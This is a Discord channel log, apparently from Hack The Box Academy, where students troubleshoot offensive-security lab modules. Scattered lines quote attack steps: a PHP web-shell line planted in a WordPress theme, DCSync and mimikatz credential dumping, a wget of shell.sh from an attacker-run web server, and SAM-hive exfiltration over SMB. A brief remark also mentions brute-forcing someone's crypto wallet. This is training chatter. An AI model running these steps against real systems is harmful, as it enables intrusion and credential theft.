#modules

1 messages · Page 114 of 1

proud pine
#

I think the order of the modules hasn't been tweaked yet - it's a little odd.

acoustic owl
#

Why is the order odd?
Okay, Network Traffic Analysis could have been placed earlier. But apart from that?

proud pine
acoustic owl
#

Yes, it doesn't have much in common with the rest of the modules.
I think there's still something about phishing to come. Only then JavaScript really becomes a topic

trail leaf
#

JavaScript Deobfuscation being there might just be because they put malware analysis so late

acoustic owl
#

Let's see what the path looks like when it's complete.

heavy marsh
#

I'm on the windows file transfer methods module and I don't see any references to the command "python3 -m http.server 8000"

#

That's what I've used in the past for download operations. Just curious, I expected to see it mentioned.

#

Forget I said anything, I just looked ahead and it's in the linux transfer methods module

#

that makes more sense.

#

I just saw the python3 -m uploadserver command and thought it would be in the same module

rustic sage
balmy saffron
#

Hello,
In the module Ad, Section "Attacking Domain Trusts - Child -> Parent Trusts - from Windows"
I get a golden ticket for user hacker using mimikatz. I can see it with klist. However the command : ls \academy-ea-dc01.inlanefreight.local\c$
returns an error. Is it me or something else?

fathom pendant
#

pika_sip ban speedrun

zinc marsh
#

any recommendation which to do first?

#

<@&861185840277487616>

#

this is rule break right?

trail leaf
#

Serious Rule Break skip for the any% ban speedrun :o

novel matrix
#

Tells us that we can’t do nothing but dam where his messages at? Haha

slate carbon
#

127.0.0.1

zinc marsh
#

<@&861185840277487616>

#

what is happening this night lol

novel matrix
zinc marsh
#

one guy asking for someone to perfom ddos attack to an ip

heavy marsh
#

Can anyone explain the commands here? I understand the outcome, but I don't want to blindly follow commands without knowing more about how they work.

karmic maple
#

Hi Everyone! I'm working on Academy module for footprinting. Making my way through the Hard lab at the end. I've managed to capture some keys, and SSH into the system. I don't have root, but I'm wondering if there are any suggestions or things to look for once establishing a foothold. I've check some cache history of bash under the user I have logged into, but nothing stands out. Any suggestion?

restive steppe
real copper
wild dragon
little wyvern
#

Hi
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found the user named D..., could sy give me a hint how to find his password? I search through the git repositories but nothing.. maybe I missed sg?

autumn pilot
#

there is no need to attempt to find his password

cunning prairie
fresh compass
#

Hi! Im with the Password Attacks module in the medium lab and I dont have a good wifi connection. I have retrieved some users but just got false positives with the 123456 password

#

I am trying to brute force ssh with hydra but nothing with the password list provided and with rockyou or mutated list it take a lot of time

#

Any hints of what password list use to save time?

quaint hemlock
#

can anyone help me with the windows privilege escalation module dnsadmins sections?
I can't get the flag or the reverse shell even after I follow the step by step from the module, is there something missing?

frozen mesa
#

Footprinting - mysql
I cannot install the mysql server and it does not seems to be installed on the pwnbox. Anyone a nudge?

autumn pilot
carmine trench
#

yo guys why cant i send pictures in here?

high zinc
#

I guess because you haven't verified your Discord account yet

carmine trench
#

how do i do that

high zinc
#

go to #bot-commands and type /verify then follow the instructions the bot DMs you

autumn pilot
rich perch
#

Hello everyone! Recently, I've been having this problem where any target machine becomes very unstable. It's on for a few minutes, then randomly goes off and I can't access it for some time. Then, it just randomly goes on again. This makes it nearly impossible to solve questions. The problem also happens in every module. I tried this with Pwnbox and the same thing happens. Has anyone else been experiencing this problem? Or is it just me?

autumn pilot
#

reach out to support through the website

carmine trench
#

why i cant find my account Identifier?

#

im in my user settings right now but i cant find it

rich perch
high zinc
#

the token is copied from the right hand side of the page

carmine trench
#

oh its on the main platform

craggy wyvern
#

@fallow delta please how you rdp with user ilfserveradm

carmine trench
#

I just guessed

acoustic owl
#

Please delete the image.
Answers to questions should not be posted

carmine trench
#

sorry didnt know

#

but how did i got it right? i dont understand

autumn pilot
#

if you have looked carefully enough at the last result, there is a variable that can help you identify the operating system based on the value

acoustic owl
#

How you did it, I do not know. How to do it correctly is described in the module

autumn pilot
#

from one x range to y range, you can guess the operating system

carmine trench
#

im new to this cyber world, so i dont understand you sorry

#

like i think im in the secound module

#

are you talking about the X(ip) > Y(ip)?

autumn pilot
#

Nope, not the IP, its something that has live in its name

carmine trench
#

im so confused lol

autumn pilot
#

Try to ping yourself (localhost) and look at the values, you know that you use a Linux OS disregarding the distro flavour

#

Also, disregard the time column that holds the values in ms

craggy wyvern
#

please how to rdp to user

carmine trench
#

ohhhh

carmine trench
#

🙏

#

but i dont get how a ttl is related to an os

fathom pendant
#

Each os has their own default ttls

#

For pings

carmine trench
#

got ya

#

thx

lone pendant
#

I am doing Hacking Wordpress module, and I am at the last section, skills assessment, wpscan is telling me that the target does not seem to be runging wordpress.

#

and I manually checked the target

#

i does not seem to actually running wordpress

lone pendant
#

what source code

acoustic owl
#

From the Website
Pay attention to the a tags

#

I think .com is wrong

lone pendant
#

I came accross this articule

tall saffron
#

yeah filter the paths of that domain

#

^^

acoustic owl
lone pendant
#

oh I did know that this was from another module, my bad

acoustic owl
#

Yes, it will be announced soon

proud pine
#

I imagine red team experience is more valuable as a blue teamer, than blue team experience would be as a red teamer.

acoustic owl
#

If you want to attack something, you must know how a defender thinks and acts.
If you want to defend something, you must know how an attacker thinks and acts.

vivid igloo
#

do i have to lget the root privs to get the flag ?

#

cant find the flag on any file in / dir

carmine trench
#

how do i find an hostname of a target?

vivid igloo
#

hostname

undone narwhal
vivid igloo
carmine trench
warm bison
#

how to install kali linux

#

tell me

carmine trench
warm bison
fresh compass
#

Hi! Im with the Password Attacks module in the medium lab and I dont have a good wifi connection. I have retrieved some users but just got false positives with the 123456 password
I am trying to brute force ssh with hydra but nothing with the password list provided and with rockyou or mutated list it take a lot of time
Any hints of what password list use to save time?

zinc marsh
#

I arrived 50 modules prayge

cold marsh
#

guys, im doing the module Post-Exploitation, i dont find right answer for the question nr2, according to me is PCI, but it doesnt work

carmine trench
#

Can someone help me with that?

#

Its the network enumeration with nmap

modern falcon
#

is there any one that has done Linux Privilege Escalation > Logrotate and is willing to help me with sanity check? I want to know what I did wrong with my command

#

The command is probably spoiler so I'm not sure if I can post it here

broken warren
modern falcon
carmine trench
modern falcon
modern falcon
hushed bough
#

I'm a bit desperate here I am on Password Attacks Lab - Hard already got the .vhd file, but I can't mount it, only one partition appears on the disk partitions and it's not bitlocker I've tried it on the VM I can't do it either can someone help I've tried the guestmount and it always gives an error

fiery berry
quick magnet
#

hi i stuck in Linux File Transfer Methods question 2

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer

already upload with scp, but when ssh and extract .zip value is invalid

frail spear
#

Module : Windows event logs & finding evil
Section : Windows event logs.

Question 1 : Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

Hi ! I'm currently stuck there too, can you tell me what I'm doing wrong ?

high zinc
lone pendant
#

I am doing wordpress hacking, final assigment, I am trying to do RCE, when I update from theme editor it tells me this error. I simply add this line: "system($_GET['cmd']);"

#

Is this suppose to happen.

Never mind I just update another theme and it worked. I still think that this error is not supposed to happend.

rustic sage
#

Hi guys. How can I learn how to get a reverse shell from XAMPP? It's for a module

high zinc
rustic sage
#

@high zinc it doesn't

high zinc
#

it should, otherwise chances are you're not supposed to get a rev shell

#

XAMPP contains MariaDB, PHP, and Perl, all of which have ways to give you a shell, if they are configured incorrectly on the target machine (or vulnerable versions are running)

rustic sage
#

dude, I've done many modules and I always have to search things

high zinc
#

that happens sometimes yes.. but yeah, depending on what your target has running and how, different methods exist. XAMPP is a suite of tools

rustic sage
#

sometimes lol

#

literally always

high zinc
#

so far I've been copy/pasting from the sections to my terminal in the CPTS path, and I'm 13% through 😄

rustic sage
#

just wait

high zinc
#

Maybe it can help

#

(worthy of a bookmark regardless)

lone pendant
#

I am stuck at this last question in wordpress last section and it is driving me nuts, since I even got the reverse shell, Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?

#

I have no clue where this file might be

rustic sage
#

you have the file, right?

#

in your computer

lone pendant
#

?

rustic sage
#

in some modules when you donwload things

#

you have to use ls -al

acoustic owl
high zinc
#

I've typically found flag files in /home/<someuserhere>/flag.txt, /root/flag.txt, /flag.txt ../../../../../../../../../../flag.txt (i.e. at the root of the context that the vulnberable web is at, when exploiting, like /var/www/myLittlePhpPlatform/flag.txt)

acoustic owl
high zinc
acoustic owl
high zinc
#

oh

acoustic owl
#

Access via terminal is of no use to him in this task

high zinc
#

i see

lone pendant
#

This makes no sense to be honest

acoustic owl
#

i'm not entirely sure, but i think so

acoustic owl
lone pendant
#

The formulated question does not specify the file name

acoustic owl
#

Because it doesn't need to.
Find the plugin, exploit the vulnerability and get the flag.

rustic sage
#

Just go to the forum, usually you find hints there

acoustic owl
#

i told him what to do

lone pendant
high zinc
#

(if you haven't scanned with a (free) API key by the way, it'll make a huge difference )

acoustic owl
#

No, i talk about a Plugin with unauthenticated file download

lone pendant
#

There are so many vulnerabilties on the report, and none of them talks about arbitrary file download

acoustic owl
#

Use a search engine

lone pendant
acoustic owl
carmine trench
#

can someone help me with that error? im tying to convert a xml file into an html file

lone pendant
cunning prairie
floral fulcrum
#

for the pivoting module's skill assessment, has anyone tried pivoting thrice to the DC? or is it simply not possible

fresh compass
# cunning prairie Is bruteforcing the first thing you did?

No, the first thing that I did was to bruteforce the smb shares and retrieve a password protected zip file. I have tried to crack it but no password was found. I can’t do anything more in the smb shares, so I tried to find any valid credentials for the ssh service but I got stuck here.

modern falcon
#

Have you tried to crack the zip file with the mutated password list?

carmine trench
#

why do i want to disable this scans?

trail leaf
#

I want to say that Windows, by default, doesn’t respond to ping but that could have changed.

#

Regardless, sometimes you know a box exists but can’t ping it, so that’s what that option is for.

carmine trench
#

to not waste time?

trail leaf
#

The other two are built-in with a similar mindset

trail leaf
carmine trench
#

👍

high zinc
#

You may also end up in situations where ICMP is blocked on the network, so if you don't assume that the host is online, the scan will fail

#

(yes, blocked... some security folks are too paranoid)

compact carbon
#

So got a technical question because I might be doing this wrong. Trying to do the Privilege Escalation lesson in the Getting Started module and I've gotten the first flag and from here I'm trying to do further enumeration by pulling linpeas onto the target however both curl and wget are timing out when connecting to my machine. python3 was initially trying to set the ip to 0.0.0.0 so I changed it to my tun0 connection thinking that would allow it to connect but it seems I'm wrong. Anyone have guidance on this?

trail leaf
#

When a program says it’s listening on 0.0.0.0, that means it’s listening on all interfaces

#

You might not be specifying the correct IP, port, or path

fresh compass
carmine trench
#

an explanation about them

high zinc
#

nmap --help and particularly man nmap are good places to start 😄

obtuse verge
#

Hi! Im doing the last question og the Windows PrivEc - Pillaging, and i have the SYSTEM, SECURITY AND SAM Files but secretsdump for some reason fails. Can someone help me?

compact carbon
trail leaf
#

Yep

compact carbon
#

Fingers crossed, I've been at this question for awhile now.

trail leaf
#

Shouldn’t take that long :/

cunning prairie
trail leaf
#

If you ran python3 -m http.server 8080 you should be doing wget http://10.10.10.10:8080/shell.sh

#

Assuming shell.sh is located in the path you started the webserver in

elfin cedar
#

omg these modules are making me crazy

#

I have more problems getting things to work than learning I am DONE

upper lagoon
#

What exactly are struggling to get working?

elfin cedar
#

JUST EVERYTHING

#

😭

upper lagoon
#

If you can get more specific we can try to help you

elfin cedar
#

im just done

#

ITS SO EASY BUT THEY MAKE IT SO HARD

#

Proxy>Options?? its Proxy>Settings. Then go to Intercept Server Responses...NOPE, its Response interception rules. ITS LIKE THIS EVERY MODULE IM DONE GOODBYE

rustic sage
#

yep

#

some options they provide don't work

upper lagoon
#

The GUI may be changed, but the features are for sure still the same.. you just have to adapt
It should not be that frustrating to follow along clicking on Options instead of Settings.. it has pretty much the same meaning

elfin cedar
#

thats just one example

#

I keep running into something every module

upper lagoon
#

Btw, you can report outdated things or bugs on #858470491676737536.. if some of HTB staff feels like it's important enough, it will be solved asap

elfin cedar
#

but like what is this wording

#

In Burp, we can enable response interception by going to (Proxy>Options) and enabling Intercept Response under Intercept Server Responses.

#

then the next sentence:

#

After that, we can enable request interception once more and refresh the page.

#

what do you mean ONCE MORE???

#

"In Burp, we can enable response interception by going to (Proxy>Options) and enabling Intercept Response under Intercept Server Responses. After that, we can enable request interception once more and refresh the page." ONCE MORE??

#

im done bro, I have to take a chill pill

#

thanks for helping

upper lagoon
#

I think none of the issues you're talking about are making it impossible to understand those concepts.. many modules could be done better but on average it's actually pretty good content for someone trying to learn
Get a brake and try again later on.. that is probably a good way to deal with this situation

carmine trench
#

why there is so mush lines? i did the exact same commands on the left and i got tons of lines

#

and it keeps going

upper lagoon
#

If you scroll down a bit more, in that table, you will see what the --packet-trace option means and that will explain everything

carmine trench
upper lagoon
#

That "pic" has a line which is <SNIP> every time you see that, it means something from the command output has been omitted from the output you can see.. usually it's info that is not considered essential

carmine trench
#

ohh alr

#

can i get some help here? im stuck😕

#

i got all the open ports and the services but i have no idea what to do next

rustic sage
#

Generally speaking, try to provide which module you are on:)

carmine trench
#

Network Enumeration with Nmap

#

Service Enumeration

onyx girder
#

Yo

fathom pendant
#

No

onyx girder
#

Wym *

fathom pendant
#

Thats completely unrelated to academy

onyx girder
#

..

fathom pendant
#

And learning modules

#

:)

rustic sage
#

@carmine trench did you try something similar to the examples given in the module?

onyx girder
#

Nice so this server is called “HackTheBox” for no reason

rustic sage
#

There is allegedly a offtopic server somewhere

fathom pendant
#

HackTheBox is the name of the website you absolute knob

fathom pendant
#

The other perks of doing so are it allows you to post images

rustic sage
#

thx, something messed up with my account, gotta contact a mod

fathom pendant
#

That happens

#

If you look at members list you can see mods/admins and you can message any of them :D

cunning prairie
acoustic owl
civic zenith
#

Hey guys I'm on DCSync of Active Directory Enumeration & Attacks. Im supposed to find syncron's cleartext password but I keep getting timed out errors: secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[-] RemoteOperations failed: [Errno Connection error (172.16.5.5:445)] timed out
[*] Cleaning up...

#

Also if I try the mimikatz method to accomplish the same thing:

#

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

rapid sparrow
civic zenith
#

Yes

civic zenith
#

@rapid sparrow Password123! should be wley's password

high zinc
#

my reasoning was that something happened after 4907 which would be the next thing

rapid sparrow
acoustic owl
high zinc
#

sure

civic zenith
#

@rapid sparrow no you don't have to, just change Password123 to wley's pw, you can keep the powershell session open

rapid sparrow
#

this is the biggest problem...

#

Creating a Fake SPN

civic zenith
#

btw I forgot to mention you have to re-enter all the commands

#

@acoustic owl is it alright if I DM you?

rapid sparrow
civic zenith
#

@rapid sparrow sure lets DM

high reef
#

i'm doing the module ATTACKING SAM. i'm trying to do the lab but i keep getting an error which i can't figure out why its not working

#

i run the command sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/bluekali

and when i try to transfer the files over to attack machine it disconnects for some reason

#

this is the rdp session to move the files over

trail leaf
high reef
trail leaf
#

Ok, so where does that command save the file to?

high reef
#

to the C drive

trail leaf
#

And where are you running the move command from?

high reef
#

🙈 thanks @trail leaf

rustic sage
#

Have you read the text...?

carmine trench
#

whats about it?

#

oh fuck

rustic sage
#

In your screenshot that is

carmine trench
#

no way

#

😩

#

dude i been stuck on this for hours

#

omfg

rustic sage
#

Happens

carmine trench
#

oh wait@rustic sage

#

i tried to right it as the answer

#

and it doesnt work

#

what am i doing wrong?

opal jewel
#

Is anyone past Tomcat section on Attacking Common Apps?

fiery berry
opal jewel
#

No idea where that flag is located. I got a quite intractive webshell and using find / produces nothing

fiery berry
opal jewel
#

Why didnt I think of that

fathom pendant
#
  1. remove your screenshot as it's revealing an answer
  2. you're probably also copying the 220 response code part, the flag is just the HTB{...
opal jewel
tulip parrot
#

hello i m in the live engagement of Shells & Payloads and i can t manage to connect to 172.16.1.11:8080 is it working for you ?

fathom pendant
tulip parrot
#

the vpn ?

fathom pendant
#

No

#

When you spawn target

#

Are you connected via rdp to that system

#

That's the first step

tulip parrot
#

Ok i connect via rdp

#

and from there i connect to others ?

fathom pendant
#

Yes

#

As the 172.16.x.x are internal

#

Note: for the webpage one, you can start Firefox by typing firefox in the terminal

tulip parrot
#

thanks you

sly kelp
#

Did you download the word list from resources tab?

#

Do that XD

#

That's is 80% of answers

fathom pendant
#

Also

#

Creating the mutated password list from those files

simple merlin
#

Can someone give me advice for NoSQL - Skills assesments 2 ? I guess I found the idea, but I'm stuck with it

deep owl
#

hello all

#

module USING WEB PROXIES

#

section: ZAP Fuzzer

#

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

#

i was able to fuzz and get the cookie hash

patent egret
#

ok

deep owl
#

but how do i use the hash as a cookie to get the flag

wide river
#

Module: window priv esc
Section: weak permission
Description: this section being haunted :))

slow ruin
#

Anyone able to give a nudge on Citrix Breakout? I started the smbserver on the htb-student box I rdp'd onto. But when trying to access the smb share I get Windows cannot access the share. Not able to transfer the tools needed to priv esc

knotty hemlock
#

can someone help me with Snort Rule Development in the Working with IDS/IPS module? I found the respective line in the pcap file and I googled many snort signatures for log4shell, but i have no idea what the question is about.

There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

late cedar
#

anyone here who could help me out with 'oopsie'?

#

uploaded the reverse shell but netcat does not show up anything

trail leaf
karmic maple
carmine trench
#

can somone explain to me what does the /24 means?

zinc hemlock
#

@carmine trench look up CIDR notation

high reef
#

how do i bypass AV to move a file?

#

nvm i found the solution

pulsar hazel
#

./odat.py file taking its time completing - thanks Footprinting module

compact carbon
#

So Getting Started-> Priveledge Escalation. Am I going down the wrong path trying to get linpeas onto the target machine to enumerate it? I'm thinking that's the goal but I also feel like I'm going the wrong way at times.

trail leaf
#

You can use Linpeas or you can try to enumerate manually, up to you

trail leaf
elfin cedar
#

I am having trouble

#

I am not seeing the request in burpSuite HTTP history section when i run the nmap scan

#

I have tried with Intercept on and off

#

maybe its just taking a long time, its going through proxies or whatever I GIVE UP

#

yeah, it just took awhile I got it. I am gonna lose it before I get through all these modules

high reef
#

i'm cracking an NT hash

#

and for some reason hashcat isn't spitting out the password, any idea/tips to help

trail leaf
#

thought hash had to be in a file 🤔

tidal mango
# high reef

looks like maybe it found it already? try adding --show at the end

high reef
trail leaf
#

guess I learned something today

gloomy bramble
#

Attacking Common Services - Easy: I have credentials, I now have been stuck on reverse shell. I've tried netcat, weevely, amongst a few other methods. Nothing working. From the forum, I see some folks uploaded through mysql, but I am uploading thru the browser. Can I get a nudge on which is the path to go? Also, which shell worked for you? Neither has for me.

quiet ember
gloomy bramble
fossil crescent
balmy saffron
#

Hello,
"Attacking domain trust from windows"

Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session

mimikatz # exit

Then Klist returns effectively the cached ticket but I get "path does not exists" when I check with:

ls \academy-ea-dc01.inlanefreight.local\c$

#

I need a nudge for this one...

#

discord removed the double backslash after ls

fossil crescent
balmy saffron
#

Thank you.

#

I am still investigating my issue.
In a session without golden ticket, I expect a

ls : Access is denied```
#

But I get

#

ls : Cannot find path '\\academy-ea-dc01.inlanefreight.local\c$' because it does not exist.

#

So navigating through windows explorer I tried some folders I found there, such as User Share, Department Shares, ZZZ_archive. But I get the same error message like nothing exists.

#

And with the golden ticket I get the same results.........

proud pine
balmy saffron
#

I tried that too

#

172.16.5.5

modern falcon
#

In Linux Privilege Escalation > Logrotate, I tried to use the root permission from the logrotten exploit to write a setuid file a.sh

(Use echo to write this to a.sh)

#!/bin/bash

whoami
cat /etc/sudoers

Then chmod 4777 a.sh (as root)
when I run ls -l a.sh, it show -rwsrwxrwx root root. However, when I try to use the account htb-student to run ./a.sh, the whoami command returns htb-student, and the cat /etc/sudoers command returns permission denied. What did I do incorrectly with setuid?

teal hull
# high reef that worked thanks

There is a file in the hashcat file that’s called potluck or something pot. It stores your found hashes. So what happened is you found this hash/password before and it’s in the file. If the hash is in the file it does not try to crack it.

balmy saffron
#

hashcat.potfile

teal hull
#

@high reef If you are testing delete the found/know hashes from profile. It will try to crack the hash again. Thanks @balmy saffron

fathom pendant
teal hull
#

2 weeks ago a guy told me how he locked abunch of cyptro in a wallet. Asked me to help, told him I have a lot of gpus but no idea how to brute force. Spent the last 2 weeks learning how to. I am currently at 7 space password. Should be done tonight. No password yet. So now I shall learn how to do a dictionary attack

fathom pendant
#

That's completely unrelated to academy content

teal hull
fathom pendant
#

No

teal hull
fathom pendant
#

Which is what this channel is about

#

Which is why I referred you to #welcome , which tells you how to access more of the server

teal hull
fathom pendant
#

Not really but whatever

#

Not arguing about it

teal hull
#

Probably stop being a Npc your life will be more enjoyable

fathom pendant
#

Oh no I got called an NPC

#

My life is joever

teal hull
teal hull
# fathom pendant My life is joever

So we are 20 more useless comments into this channel. Because you wanted to show your power over someone on discord. You showed me my guy. As Jesus would say love your neighbor

fathom pendant
#

Lol I have no power

teal hull
fathom pendant
#

I'm just stating the story didn't seem relevant

#

¯_(ツ)_/¯

#

Whatever you gotta say pal

teal hull
fathom pendant
#

I mean I haven't been mean

teal hull
#

Not everyone is you and not everyone follows your logic

teal hull
#

Have a lovey rest of your night maybe it will be less toxic

fathom pendant
#

The only one really being toxic is you, calling me an NPC. Being slightly butthurt that I just didn't think your story was relevant. Like, good job you're learning hashcat and cracking files.

#

Which there is a password attacks module that goes over different types and methods. Mostly over live tcp protocol, some regarding files

frank seal
#

Hey, im currently using rpcclient to enumerate domain users and want to either write the output to a file or grep the output. I've tried looking at documentation and looked it up but I haven't found anything quite yet

#

does anyone have any pointers?

#

enumdomusers > output.txt didn't do anything when i tried

#

no stress if not 🙂

fathom pendant
#

I think the rpcclient tool allows you to pass a command through that you might be able to output it as

frank seal
#

alright I'll have a look at that cheers

vital adder
#

yep and hint if burp is going to fast set the delay to 25 sec

vital adder
#

also which the powershell set to bypass you can import stuff straight from your smb share Import-Module \\10.13.38.95\share\PowerUp.ps1

vital adder
slow ruin
vital adder
#

yea working with windows 7 or earlier lab is always a pain in the ass

vital adder
frank seal
modern falcon
leaden quail
#

Hey guys, im doing the Windows Command Line Module and and I wonder why/when we should use the "Invoke-Command" cmdlet and put commands in a script block and not just execute them directly?

digital pewter
#

If anyone has a moment to lend me a hand with the logrotate section of the Linux Privilege Escalation module I'd really appreciate it.

modern falcon
digital pewter
rich perch
#

Hello, I'm having trouble on the Pivoting, Tunneling, and Port Forwarding module. I'm stuck at the SocksOverRDP section. Whenever I try to use regsvr32.exe to load the DLL file required for SocksOverRDP to work, it gives me the error "module failed to load, the specified module could not be found". The filepath is definitely right though. Am I doing something wrong?

fathom pendant
#

Defender is turned off however that does not disable another protection feature that works in real time

rich perch
fathom pendant
#

You could also just disable real time protection iirc

#

Either way

#

:)

hazy grotto
#

Not sure why this isn't working.

I'm trying some pivot stuff. I watched in a video that this command should drop another ssh menu inside a ssh connection.

#

It's supposed to work like this.

#

Can't anyone help on why this isnn't working?

fathom pendant
#

Skill issue? I'd check the guide as that looks more like a key combo than anything else

#

^C denoting the hard cancel

#

But also what module is this for 😉

hazy grotto
#

Shhh... This is the best section to ask question and technically..... I'm hard stuck on Pivot module so i'm trying this box to get a better understanding of it. I noticed the cancel to but i think i saw in a another video Ippsec did that as well. Does Ipp have write ups? I thought he only did the videos

fathom pendant
naive wadi
hidden trellis
#

Hi mate is it possible to get a help on this..?

rustic sage
#

Hi @gaunt surge I also have issue finishing that lab , me, I'm at the poit where i should do the reverse or bind shell but neither works for me.Any suggentions or hints please?

pulsar needle
#

I have this base64 encoded ticket, how am i supposed to get the ticket into aes? If I decrypt it with base 64 i get some weird stuff

gaunt surge
pine dagger
zinc sentinel
#

hello anyone able to confirm what answer will be accepted here in Documentation & Reporting
i can do it in tmux with tmux but answer isnt accepting, trying caps/ spaces..?

pulsar needle
zinc sentinel
hazy grotto
pulsar needle
#

I am wondering how i can use the base64encodedticket thing as a ticket

#

If I try to use the base64encodedticket it gives me an error

#

and I just want the ticket

#

as aes256

#

but I cant

zinc sentinel
#

what module

pulsar needle
#

I dont get why that is important but ok

zinc sentinel
#

bcuz iv seeen the issue before and have notes on it somewhere

pulsar needle
#

ah oke

zinc sentinel
pulsar needle
#

The thing is

#

Lol

pine dagger
#

If you follow the example step by step, you should find it.

pulsar needle
zinc sentinel
#

is it Ctrl, Control, control ctrl ctl?

#

got it... what a giant POS ...

#

funny how iv refreshed the page its its dropped one of the [KEYS] off my answer now ...
the questions says "(Answer format: [key] + [key] + [key], " but the accepted answer format has 4x [KEY] spaces

#

answer format is misleading

pine dagger
zinc sentinel
pine dagger
#

it literally says that in the question

zinc sentinel
#

are we looking at the same ? mine shows 3x KEY spaces

#

not Ctrl + 3

pine dagger
#

Mine is 4

#

They probably made it accept both for those people with Macs

zinc sentinel
#

same question , only the top answer accepted for me but when refreshed changed to the bottom?.
answer format showing 3x KEY spaces

fresh pine
#

Please help! I can't get the shell doing everything "right".
Module = Shells & Payloads | Automating Payloads & Delivery with Metasploit
Error = Exploit completed, but no session was created

fiery berry
pine dagger
#

Cant see anything obviously wrong, but one of things I've always done is set the LHOST to the name of the VPN tunnel interface (in pwnbox its tun0), rather than the IP address. Saves on typing, and you dont have to remember the IP.

#

And of course you dont get frustrated if the IP address changes after the VPN drops 😄

fresh pine
#

it worked from the pwnbox, idk why

#

thank u for your help@pine dagger @fiery berry

rustic sage
#

After so many hours of reading about xampp I finally got the flag FeelsGoodMan

#

the guys on the forum were right, you have to understand how things work in order to hack them

#

and read the documentation

uncut flint
#

$ sudo zip2john backup.zip > hashes
zsh: permission denied: hashes
on module vaccine, any help

acoustic owl
pine dagger
twilit gull
#

Can anyone help me with logrotate module in linux privilege escalation. I don't know where to start and what to do.

acoustic owl
fresh compass
#

Hi! I’m a bit lost in the Password Attacks Lab - hard, I have the vhd file but I don’t know what to do with it. Any help?

#

I have tried to mount the image in win 7, 11, kali and manjaro and nothing. I use 7z to decompress it but I cant do anything with the img files

acoustic owl
fresh compass
acoustic owl
#

Yes exactly, bitlocker
Have you cracked the password?

fresh compass
#

No, I don’t know what to use

fresh compass
acoustic owl
rustic sage
#

guys, is /usr/share/dirb/wordlists/small.txt good for ftp brute forcing?

pine dagger
#

How would you use it for ftp brute forcing? It’s a list of directory names, not users

rustic sage
#

I don't know which to use

carmine trench
#

Guys how do I check which host are up in a network using nmap? like what is the command

pine dagger
#

Rockyou is always good for passwords

rustic sage
#

the list they provide doesn't work

pine dagger
#

If they provided it for a module then it should work

rustic sage
#

if things were that simple

acoustic owl
rustic sage
#

@acoustic owl I didn't need a wordlist, like you said in the forum, for some reason the unusual port wasn't open

carmine trench
rustic sage
#

--open

#

like sudo nmap --open

clear bough
#

hello everyone, can i DM anyone about Kerberos Attacks - Skill Assessment on the first question?

rich perch
#

hello! i'm having trouble on the NFS part of Footprinting. When I try to mount the share it gives me the error "operation not permitted" even though I'm running the command as sudo.
here's the command I'm using: sudo mount -t nfs 10.129.53.125:/var/nfs ./nfs/ -o nolock
am i doing something wrong?

narrow solar
#

hey friends, hope you a good day, i am at Login Brute Forcing website skill assessment, i am stuck at the 2nd question , i tried rockyou and couldnt have a hit before the machine time is out, tried with rockyou-50 but didnt hit, i am sure that my post form code is correct, i just dont know where the problem

fiery berry
rustic sage
#

@rich perch try using sudo mount -t nfs 10.129.53.125:/ ./target-NFS/ -o nolock

fiery berry
narrow solar
rich perch
rustic sage
#

If you need help in Footprinting just tell me. I can give you hints to save your mental

rustic sage
#

Hey, need help with Footprinting Lab - Easy.

Found two ftp servers @ port 21 and 2121. Connecting to them works fine, but not possible to find any files with ls. I tried the ||wget -m --no-passive ftp://uname:pw@ip:port|| but no results. Have tried reseting target box. Any pointers?

#

solved* for future references, check firewall settings:)

#

On your client, not the server

#

ls -al

#

connection refused due to firewall settings was the issue

pale oriole
#

Can anyone help me mounting a BitLocker vhd file? It is from the password attacks hard lab. I have already found the password to decrypt the file, but can't get a prompt to put it in.So far I have tried

  1. The windows vm that is part of the assignment, but I can't mount it as I need the Admin's password and I feel like that is in the vhd file
  2. The parrot box was not able to install the necessary tools to mount it within Linux
  3. Cannot find anything that will allow me to mount it on my Mac
  4. My AWS Windows VM couldn't recognize the file and chose to not do anything with it
  5. My physical Windows computer also has no idea what to do with it. Literally no option to mount it in any way
  6. My Kali vm, just like the parrot box, cannot install the tools necessary
    At this point I just want to know what is inside, I don't care how I get it
fathom stump
#

Is there a way to improve nmap speed over vpn? Running the pwnbox in a browser, nmap performs much faster scans, but I prefer to use a vpn, however it can be a bit annoying sometimes seeing a scan that's estimated to take a few hours, when on the pwnbox it completes in 10 seconds.

fiery berry
fathom stump
#

Sure, but running the same scan on the pwnbox is sometimes several hours faster for some reason

proud pine
fiery berry
pale oriole
pine dagger
#

I used that to make it work. Which tool is coming up with the error?

pale oriole
#

The very first one "qemu-utils"

#

That is at least on my kali box. On the parrot box I can get up to "modprobe nbd" where it says "modprobe: ERROR: could not insert 'nbd': Operation not permitted"

pale oriole
pine dagger
pine dagger
pale oriole
fiery berry
#

Open a PS instance as Administrator

elfin cedar
#

lol this is a joke

#

I CANT BELIEVE THIS

#

im done

#

for real this time

pale oriole
